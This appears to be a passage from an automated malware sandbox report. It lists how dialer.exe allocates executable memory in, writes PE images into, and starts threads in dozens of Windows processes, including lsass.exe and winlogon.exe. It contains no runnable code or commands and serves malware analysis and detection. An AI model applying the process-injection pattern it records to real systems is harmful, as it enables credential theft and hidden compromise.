                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B5645B0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2108BCE0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29166930000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19E27BC0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B550000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 87C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBEC970000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 293C71D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 124A2600000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 2DB0D940000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 22D67CF0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 231E6560000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 200CD9C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA61CB0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D280EE0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29A47940000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\ProgramData\Microsoft\based.exe base: 235BB850000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\ProgramData\Microsoft\based.exe base: 1EB88710000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 2879CCE0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1BCECE80000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22E54100000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\ProgramData\svchost.exe base: 2C3F57C0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\ProgramData\svchost.exe base: 23340F40000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 10E63130000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 181280D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 261E5AC0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 1EC96960000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 13C461D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Google\Chrome\updater.exe base: 23E9EDD0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\timeout.exe base: 285327A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 1EC96AF0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1D8E5800000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC61273C
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB273C
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AF1B273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8799273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5377273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D53273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 67D273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5B38273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EBFD273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5904273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A9E7273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7316273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4E86273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 473C273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6F9D273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 83BC273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D3F7273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A415273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BDF3273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C026273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C9F3273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 645B273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B2A273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4F6273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2AB4273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ADB273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25DA273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F535273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F0D6273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FFB273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C257273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8BCE273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6693273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13EF273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D57273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 69B4273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC74273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5DA7273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199D273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F389273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3B8273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40E4273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A653273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 27BC273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B15273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 621A273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F48273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B55273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 683D273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 87C273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2E26273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6C5E273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D593273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC65273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7874273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33B4273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D0A273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB4C273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2A64273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CF3273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 644F273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4935273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 60DA273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E7B273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F7C273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E815273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5234273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9DA9273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 602E273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EC97273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C71D273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A260273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D94273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 67CF273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E656273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CD9C273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 61CB273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 80EE273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4794273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BB85273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8871273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9CCE273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ECE8273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F57C273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40F4273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6313273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 280D273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E5AC273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9696273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 461D273C
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Program Files\Google\Chrome\updater.exe EIP: 9EDD273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 327A273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 96AF273C
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\Conhost.exe EIP: E580273C
                                  Source: C:\Program Files\Google\Chrome\updater.exeNtQuerySystemInformation: Direct from: 0x7FF74A1742AE
                                  Source: C:\ProgramData\setup.exeNtQuerySystemInformation: Direct from: 0x7FF65F1742AE
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF1B0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166930000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B550000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 87C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBEC970000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 293C71D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 124A2600000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 2DB0D940000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 22D67CF0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 231E6560000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 200CD9C0000 value starts with: 4D5A
